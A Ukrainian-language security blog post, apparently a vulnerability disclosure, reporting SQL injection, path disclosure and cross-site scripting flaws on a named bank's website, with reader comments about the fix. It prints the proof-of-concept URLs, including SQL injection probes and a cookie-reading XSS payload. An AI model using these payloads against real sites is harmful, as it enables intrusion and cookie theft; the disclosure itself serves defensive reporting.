Уразливості на www.agrocombank.kiev.ua

19:01 20.03.2010

26.08.2009

У січні, 06.01.2009, я знайшов SQL Injection уразливості, а сьогодні ще Full path disclosure, SQL Injection та Cross-Site Scripting уразливості на http://www.agrocombank.kiev.ua - сайті Агрокомбанка. Про що найближчим часом сповіщу адміністрацію сайта.

Стосовно уразливостей на сайтах банків останній раз я писав про нові уразливості на www.privatbank.ua.

Детальна інформація про уразливості з’явиться пізніше.

20.03.2010

SQL Injection:

http://www.agrocombank.kiev.ua/modules.php?op=modload&name=News&file=article&sid=-1%20or%20version()%3E4
http://www.agrocombank.kiev.ua/modules.php?op=modload&name=AStatic&file=index&sid=-1%20or%20version()%3E4

Раніше на сайті використовувався PHP-Nuke, в якому я і знайшов ці дві уразливості. Але потім на сайті змінили движок на новий, в якому я знайшов нові уразливості.

Full path disclosure:

http://www.agrocombank.kiev.ua/agrocombank/search/’/

SQL Injection:

http://www.agrocombank.kiev.ua/agrocombank/search/'%20and%20version()%3E5--%20/

XSS:

http://www.agrocombank.kiev.ua/agrocombank/search/'1%3Cbody%20onload=alert(document.cookie)%3E/

Дані уразливості вже виправлені.


6 відповідей на “Уразливості на www.agrocombank.kiev.ua”

  1. Интернет Бизнес каже:

    Вам должны платить серьезные гонорары за нахождение уязвимостей )

  2. MustLive каже:

    Роман, серьёзных гонораров мне никто не платит :-) . За более чем три года работы моего веб сайта (и 4,5 года, что я занимаюсь веб безопасностью), мало кто из админов и владельцев сайтов мне даже спасибо сказал за уведомление их об уязвимостях на их сайтах.

    А так как следить за безопасностью в Уанете мало кто хочет и тем более вкладывать в это деньги (а Украина для меня является основным рынком деятельности), что мне хорошо известно, то соответственно мало кто заказывает у меня аудит безопасности, а если и заказывает, то за небольшие деньги. При том, что у меня и так одни из самых доступных цен на рынке (но клиентам всегда хочется ещё дешевле). Поэтому на данный момент о серьёзных гонорарах речь не идёт и неизвестно когда данная ситуация в Украине изменится.

  3. Thanks каже:

    Спасибо.

  4. MustLive каже:

    Всегда пожалуйста.

  5. Разработчик HydraEngine каже:

    Добрый день, защиту от Full path disclosure, SQL Injection та Cross-Site Scripting мы поставили. Свяжитесь со мной пожалуйста по емейлу, так как я думаю, что комменты будут неподходящим местом для обсуждения некоторых тем.

  6. MustLive каже:

    Сергей

    Вы попытались исправить, но исправили не полностью. И с небольшим изменением атакующего кода, все три уязвимости снова работают. Как я проверил их, после получения от вас сообщения об исправлении уязвимостей. Так что вам нужно будет их полностью исправить и в дальнейшем следить за безопасностью своего движка и своих веб сайтов.

    Связаться со мной можно как через комменты, так и по емайлу - кому как удобнее. Я писал вам и администрации Агрокомбанка со своего емайла, поэтому он у вас есть, к тому же мой емайл размещён в футере всех страниц моего сайта. Так что если вам нужно, вы легко можете со мной связаться.

Leave a Reply

You must be logged in to post a comment.